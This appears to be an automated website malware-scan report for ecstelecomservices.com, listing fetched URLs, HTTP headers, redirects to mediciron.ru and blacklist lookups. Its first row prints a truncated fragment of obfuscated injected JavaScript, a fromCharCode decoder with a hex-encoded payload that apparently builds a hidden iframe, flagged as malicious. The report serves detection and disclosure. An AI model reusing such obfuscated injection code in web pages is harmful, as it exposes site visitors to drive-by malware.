Scanned pages/files
Request | Server response | Status |
http://ecstelecomservices.com/ | 200 OK Content-Length: 7669 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function wue(){pgl=function(){--(mgozpi.body)}()}fajzjo="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)rjhddx=4;ojc=("74,ba,c9,c2,b7,c8,bd,c3,c2,74,b9,84,8d,7c,7d,74,cf,61,5e,74,ca,b5,c6,74,c7,c8,b5,c8,bd,b7,91,7b,b5,be,b5,cc,7b,8f,61,5e,74,ca,b5,c6,74,b7,c3,c2,c8,c6,c3,c0,c0,b9,c6,91,7b,bd,c2,b8,b9,cc,82,c4,bc,c4,7b,8f,61,5e,74,ca,b5,c6,74,b9,74,91,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c6,b9,b5,c8,b9,99,c0,b9,c1,b9,c2,c8,7c,7b,bd,ba,c6,b5,c1,b9,7b,7d,8f,61,5e,61,5e,74,b9,82,c7,c6,b7,74,91,7 Antivirus reports:
| ||
http://ecstelecomservices.com/test404page.js | HTTP/1.1 302 Found Cache-Control: max-age=3600 Connection: close Date: Sun, 31 Aug 2014 15:47:21 GMT Accept-Ranges: bytes Age: 0 Location: http://mediciron.ru/ Server: Apache/2 Content-Length: 204 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 31 Aug 2014 16:47:21 GMT | clean |
http://mediciron.ru/ | 200 OK Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru/modernizr.js | 200 OK Content-Length: 6296 Content-Type: application/javascript | clean |
http://ecstelecomservices.com//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 302 Found Cache-Control: max-age=3600 Connection: close Date: Sun, 31 Aug 2014 15:47:23 GMT Accept-Ranges: bytes Age: 0 Location: http://mediciron.ru/ Server: Apache/2 Content-Length: 204 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 31 Aug 2014 16:47:23 GMT | clean |
http://mediciron.ru/test404page.js | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ecstelecomservices.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Sun, 31 Aug 2014 15:47:20 GMT
Accept-Ranges: bytes
Age: 319
ETag: "1df5-4e7ecfc1302d4"
Server: Apache/2
Content-Length: 7669
Content-Type: text/html
Expires: Sun, 31 Aug 2014 16:42:01 GMT
Last-Modified: Fri, 04 Oct 2013 16:42:14 GMT
...7669 bytes of data.
GET / HTTP/1.1
Host: ecstelecomservices.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Sun, 31 Aug 2014 15:47:20 GMT
Accept-Ranges: bytes
Age: 319
ETag: "1df5-4e7ecfc1302d4"
Server: Apache/2
Content-Length: 7669
Content-Type: text/html
Expires: Sun, 31 Aug 2014 16:42:01 GMT
Last-Modified: Fri, 04 Oct 2013 16:42:14 GMT
...7669 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ecstelecomservices.com
Referer: http://www.google.com/search?q=ecstelecomservices.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ecstelecomservices.com
Referer: http://www.google.com/search?q=ecstelecomservices.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ecstelecomservices.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ecstelecomservices.com/
Result: ecstelecomservices.com is not infected or malware details are not published yet.
Result: ecstelecomservices.com is not infected or malware details are not published yet.